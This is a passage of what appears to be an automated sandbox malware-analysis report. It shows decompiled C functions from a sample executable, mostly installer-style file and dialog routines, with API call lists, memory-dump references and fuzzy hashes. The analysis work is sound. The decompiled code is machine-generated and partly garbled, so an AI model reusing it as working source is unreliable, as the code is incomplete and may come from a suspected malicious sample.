                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                          • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                          • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004060B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                          0x004060b4
                                                                                                                                                                          0x004060c4
                                                                                                                                                                          0x004060cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004060d3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004060d5

                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                          • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                          • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004044E5, Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                          0x004044e5
                                                                                                                                                                          0x004044ec
                                                                                                                                                                          0x004044f7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004044f7
                                                                                                                                                                          0x004044fd

                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                          • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                          • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                          • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004044CE, Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                                                          0x004044dc
                                                                                                                                                                          0x004044e2

                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                          • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                          • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004034E5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                          0x004034f3
                                                                                                                                                                          0x004034f9

                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004044BB, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}




                                                                                                                                                                          0x004044c5
                                                                                                                                                                          0x004044cb

                                                                                                                                                                          APIs
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                          • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                          • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                          • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E42B98, Relevance: 1.4, APIs: 1, Instructions: 143sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                          			E72E42B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t36;
				void* _t39;
				void* _t44;
				void* _t48;
				signed int _t55;
				void* _t60;
				void* _t69;
				intOrPtr _t71;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				intOrPtr _t92;
				intOrPtr _t93;

				if( *0x72e45050 != 0 && E72E42ADB(_a4) == 0) {
					 *0x72e45054 = _t92;
					if( *0x72e4504c != 0) {
						_t92 =  *0x72e4504c;
					} else {
						E72E430C0(E72E42AD5(), __ecx);
						 *0x72e4504c = _t92;
					}
				}
				_t28 = E72E42B09(_a4);
				_t93 = _t92 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E72E42AFD();
					_t71 = _a4;
					_t78 =  *0x72e45058;
					 *((intOrPtr*)(_t29 + _t71)) = _t78;
					 *0x72e45058 = _t71;
					E72E42AF7();
					Sleep(??); // executed
					 *0x72e45034 = 0;
					 *0x72e45038 = _t78;
					if( *0x72e45050 != 0 && E72E42ADB( *0x72e45058) == 0) {
						 *0x72e4504c = _t93;
						_t93 =  *0x72e45054;
					}
					_t79 =  *0x72e45058;
					_a4 = _t79;
					 *0x72e45058 =  *((intOrPtr*)(E72E42AFD() + _t79));
					_t36 = E72E42AE9(_t79);
					_pop(_t80);
					if(_t36 != 0) {
						_t39 = E72E42B09(_t80);
						if(_t39 > 0) {
							_push(_t39);
							_push(E72E42B14() + _a4 + _v8);
							_push(E72E42B1E());
							if( *0x72e45050 <= 0 || E72E42ADB(_a4) != 0) {
								_pop(_t87);
								_pop(_t44);
								__eflags =  *((intOrPtr*)(_t87 + _t44)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t88);
								_pop(_t48);
								 *0x72e4504c =  *0x72e4504c +  *(_t88 + _t48) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t106 =  *0x72e45058;
					if( *0x72e45058 == 0) {
						 *0x72e4504c = 0;
					}
					E72E42B42(_t106, _a4,  *0x72e45034,  *0x72e45038);
					return _a4;
				}
				_push(E72E42B14() + _a4);
				_t55 = E72E42B1A();
				_v8 = _t55;
				_t76 = _t28;
				_push(_t67 + _t55 * _t76);
				_t69 = E72E42B26();
				_t86 = E72E42B22();
				_t89 = E72E42B1E();
				_t60 = _t76;
				if( *((intOrPtr*)(_t89 + _t60)) == 2) {
					_push( *((intOrPtr*)(_t69 + _t60)));
				}
				_push( *((intOrPtr*)(_t86 + _t60)));
				asm("loop 0xfffffff1");
				goto L9;
			}
























                                                                                                                                                                          0x72e42ba8
                                                                                                                                                                          0x72e42bb9
                                                                                                                                                                          0x72e42bc6
                                                                                                                                                                          0x72e42bda
                                                                                                                                                                          0x72e42bc8
                                                                                                                                                                          0x72e42bcd
                                                                                                                                                                          0x72e42bd2
                                                                                                                                                                          0x72e42bd2
                                                                                                                                                                          0x72e42bc6
                                                                                                                                                                          0x72e42be3
                                                                                                                                                                          0x72e42be8
                                                                                                                                                                          0x72e42bee
                                                                                                                                                                          0x72e42c32
                                                                                                                                                                          0x72e42c32
                                                                                                                                                                          0x72e42c37
                                                                                                                                                                          0x72e42c3c
                                                                                                                                                                          0x72e42c42
                                                                                                                                                                          0x72e42c44
                                                                                                                                                                          0x72e42c4a
                                                                                                                                                                          0x72e42c57
                                                                                                                                                                          0x72e42c59
                                                                                                                                                                          0x72e42c5e
                                                                                                                                                                          0x72e42c6b
                                                                                                                                                                          0x72e42c7e
                                                                                                                                                                          0x72e42c84
                                                                                                                                                                          0x72e42c8a
                                                                                                                                                                          0x72e42c8b
                                                                                                                                                                          0x72e42c91
                                                                                                                                                                          0x72e42c9d
                                                                                                                                                                          0x72e42ca3
                                                                                                                                                                          0x72e42cab
                                                                                                                                                                          0x72e42cac
                                                                                                                                                                          0x72e42caf
                                                                                                                                                                          0x72e42cba
                                                                                                                                                                          0x72e42cbc
                                                                                                                                                                          0x72e42cc8
                                                                                                                                                                          0x72e42cce
                                                                                                                                                                          0x72e42cd6
                                                                                                                                                                          0x72e42d02
                                                                                                                                                                          0x72e42d03
                                                                                                                                                                          0x72e42d05
                                                                                                                                                                          0x72e42d09
                                                                                                                                                                          0x72e42d09
                                                                                                                                                                          0x72e42d10
                                                                                                                                                                          0x72e42ce6
                                                                                                                                                                          0x72e42ce6
                                                                                                                                                                          0x72e42ce7
                                                                                                                                                                          0x72e42cf5
                                                                                                                                                                          0x72e42cfe
                                                                                                                                                                          0x72e42cfe
                                                                                                                                                                          0x72e42cd6
                                                                                                                                                                          0x72e42cba
                                                                                                                                                                          0x72e42d12
                                                                                                                                                                          0x72e42d19
                                                                                                                                                                          0x72e42d1b
                                                                                                                                                                          0x72e42d1b
                                                                                                                                                                          0x72e42d34
                                                                                                                                                                          0x72e42d42
                                                                                                                                                                          0x72e42d42
                                                                                                                                                                          0x72e42bf9
                                                                                                                                                                          0x72e42bfa
                                                                                                                                                                          0x72e42bff
                                                                                                                                                                          0x72e42c03
                                                                                                                                                                          0x72e42c08
                                                                                                                                                                          0x72e42c1c
                                                                                                                                                                          0x72e42c1d
                                                                                                                                                                          0x72e42c1e
                                                                                                                                                                          0x72e42c20
                                                                                                                                                                          0x72e42c25
                                                                                                                                                                          0x72e42c27
                                                                                                                                                                          0x72e42c27
                                                                                                                                                                          0x72e42c2a
                                                                                                                                                                          0x72e42c30
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 72E42C57
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: 59a5cbfe22ed696dd1c3cb460ada48af2fc69d11e79904d192b7dd69175faecf
                                                                                                                                                                          • Instruction ID: 9121049f39a5472df59ad43fcf7ddaaf11bf4e99e5d08a5921b61a8477d75bca
                                                                                                                                                                          • Opcode Fuzzy Hash: 59a5cbfe22ed696dd1c3cb460ada48af2fc69d11e79904d192b7dd69175faecf
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F41A07A901204DFDB21DF69E894B593BB9EB55358F70DD2AFC05CA100DE38A9C2DB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 0040498A, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                          			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x5bafc4
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                                                                          0x0040498a
                                                                                                                                                                          0x00404990
                                                                                                                                                                          0x00404996
                                                                                                                                                                          0x004049a3
                                                                                                                                                                          0x004049b1
                                                                                                                                                                          0x004049b4
                                                                                                                                                                          0x004049bc
                                                                                                                                                                          0x004049c2
                                                                                                                                                                          0x004049c2
                                                                                                                                                                          0x004049ce
                                                                                                                                                                          0x004049d1
                                                                                                                                                                          0x00404a3f
                                                                                                                                                                          0x00404a46
                                                                                                                                                                          0x00404b1d
                                                                                                                                                                          0x00404b24
                                                                                                                                                                          0x00404b33
                                                                                                                                                                          0x00404b33
                                                                                                                                                                          0x00404b37
                                                                                                                                                                          0x00404b41
                                                                                                                                                                          0x00404b4e
                                                                                                                                                                          0x00404b50
                                                                                                                                                                          0x00404b50
                                                                                                                                                                          0x00404b5e
                                                                                                                                                                          0x00404b65
                                                                                                                                                                          0x00404b6c
                                                                                                                                                                          0x00404b6f
                                                                                                                                                                          0x00404bab
                                                                                                                                                                          0x00404bad
                                                                                                                                                                          0x00404bb3
                                                                                                                                                                          0x00404bb8
                                                                                                                                                                          0x00404bbc
                                                                                                                                                                          0x00404bbe
                                                                                                                                                                          0x00404bbe
                                                                                                                                                                          0x00404bda
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404bdc
                                                                                                                                                                          0x00404bdf
                                                                                                                                                                          0x00404bed
                                                                                                                                                                          0x00404bf3
                                                                                                                                                                          0x00404bf4
                                                                                                                                                                          0x00404bf7
                                                                                                                                                                          0x00404bfa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404bfa
                                                                                                                                                                          0x00404b71
                                                                                                                                                                          0x00404b73
                                                                                                                                                                          0x00404b77
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404b79
                                                                                                                                                                          0x00404b79
                                                                                                                                                                          0x00404b86
                                                                                                                                                                          0x00404b8b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404b8f
                                                                                                                                                                          0x00404b91
                                                                                                                                                                          0x00404b91
                                                                                                                                                                          0x00404b9a
                                                                                                                                                                          0x00404b9c
                                                                                                                                                                          0x00404ba1
                                                                                                                                                                          0x00404ba4
                                                                                                                                                                          0x00404ba9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404ba9
                                                                                                                                                                          0x00404c06
                                                                                                                                                                          0x00404c10
                                                                                                                                                                          0x00404c13
                                                                                                                                                                          0x00404c16
                                                                                                                                                                          0x00404c1d
                                                                                                                                                                          0x00404c1d
                                                                                                                                                                          0x00404c1f
                                                                                                                                                                          0x00404c1f
                                                                                                                                                                          0x00404c24
                                                                                                                                                                          0x00404c26
                                                                                                                                                                          0x00404c2e
                                                                                                                                                                          0x00404c35
                                                                                                                                                                          0x00404c37
                                                                                                                                                                          0x00404c42
                                                                                                                                                                          0x00404c42
                                                                                                                                                                          0x00404c37
                                                                                                                                                                          0x00404c52
